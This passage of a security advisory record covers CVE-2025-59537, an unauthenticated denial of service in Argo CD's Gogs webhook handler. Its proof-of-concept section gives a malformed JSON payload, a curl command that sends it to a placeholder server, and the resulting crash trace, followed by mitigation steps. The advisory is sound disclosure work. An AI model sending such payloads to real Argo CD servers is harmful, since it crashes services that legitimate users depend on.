"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.1.0-rc1"
},
{
"fixed": "3.1.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.0.18"
},
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0-rc1"
},
{
"fixed": "3.0.19"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-59537"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-476"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-30T18:28:38Z",
"nvd_published_at": "2025-10-01T21:16:43Z",
"severity": "HIGH"
},
"details": "### Summary\n\nUnpatched Argo CD versions are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients. \n\nWith the default configuration, no `webhook.gogs.secret` set, Argo CD\u2019s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field `commits[].repo` is not set or is null.\n\n### Details\n\nUsers can access `/api/webhook` without authentication, and when accessing this endpoint, the `Handler` function parses webhook type messages according to the `header (e.g. X-Gogs-Event)` and `body` parameters provided by the user. The `Parse` function simply unmarshals JSON-type messages. In other words, it returns a data structure even if the data structure is not exactly matched.\n\nThe `affectedRevisionInfo` function parses data according to webhook event types(e.g. `gogsclient.PushPayload`). However, due to the lack of data structure validation corresponding to these events, an attacker can cause a Denial of Service (DoS) attack by sending maliciously crafted data. because of Repository is Pointer Type.\n\n```go\nfunc affectedRevisionInfo(payloadIf any) (webURLs []string, revision string, change changeInfo, touchedHead bool, changedFiles []string) {\n switch payload := payloadIf.(type) {\n // ...\n case gogsclient.PushPayload:\n webURLs = append(webURLs, payload.Repo.HTMLURL) // bug\n // ...\n }\n return webURLs, revision, change, touchedHead, changedFiles\n}\n\n```\n### PoC\n\npayload-gogs.json\n\n```json\n{\n \"ref\": \"refs/heads/master\",\n \"before\": \"0000000000000000000000000000000000000000\",\n \"after\": \"0a05129851238652bf806a400af89fa974ade739\",\n \"commits\": [{}]\n}\n```\n\n```shell\ncurl -k -v https://argocd.example.com/api/webhook \\\n -H \u0027X-Gogs-Event: push\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data-binary @/tmp/payload-gogs.json\n```\n\nAn attacker can cause a DoS and make the argo-cd service unavailable by continuously sending unauthenticated requests to `/api/webhook`.\n\n```\npanic: runtime error: invalid memory address or nil pointer dereference\n[signal SIGSEGV: segmentation violation code=0x1 addr=0x68 pc=0x280f494]\n\ngoroutine 302 [running]:\ngithub.com/argoproj/argo-cd/v2/util/webhook.affectedRevisionInfo({0x3bd8240?, 0x40005a7030?})\n\t/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:233 +0x594\ngithub.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).HandleEvent(0x40000f9140, {0x3bd8240?, 0x40005a7030?})\n\t/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:254 +0x38\ngithub.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).startWorkerPool.func1()\n\t/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:128 +0x60\ncreated by github.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).startWorkerPool in goroutine 1\n\t/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:121 +0x28\n```\n\n### Mitigation\n\nIf you use Gogs and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.\n\nIf you do not use Gogs, you can set the webhook secret to a long, random value to effectively disable webhook handling for Gogs payloads.\n\n```diff\napiVersion: v1\nkind: Secret\nmetadata:\n name: argocd-secret\ntype: Opaque\ndata:\n+ webhook.gogs.secret: \u003cyour base64-encoded secret here\u003e\n```\n\n### For more information\n\n* Open an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions)\n* Join us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd\n\n### Credit\n\nSangjun Song (s0ngsari) at Theori (theori.io)",
"id": "GHSA-wp4p-9pxh-cgx2",
"modified": "2025-10-23T20:22:30Z",
"published": "2025-09-30T18:28:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59537"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43"
},
{
"type": "PACKAGE",
"url": "https://github.com/argoproj/argo-cd"
},
{
"type": "WEB",
"url": "https://pkg.go.dev/vuln/GO-2025-39896"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "argo-cd vulnerable unauthenticated DoS via malformed Gogs webhook payload"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…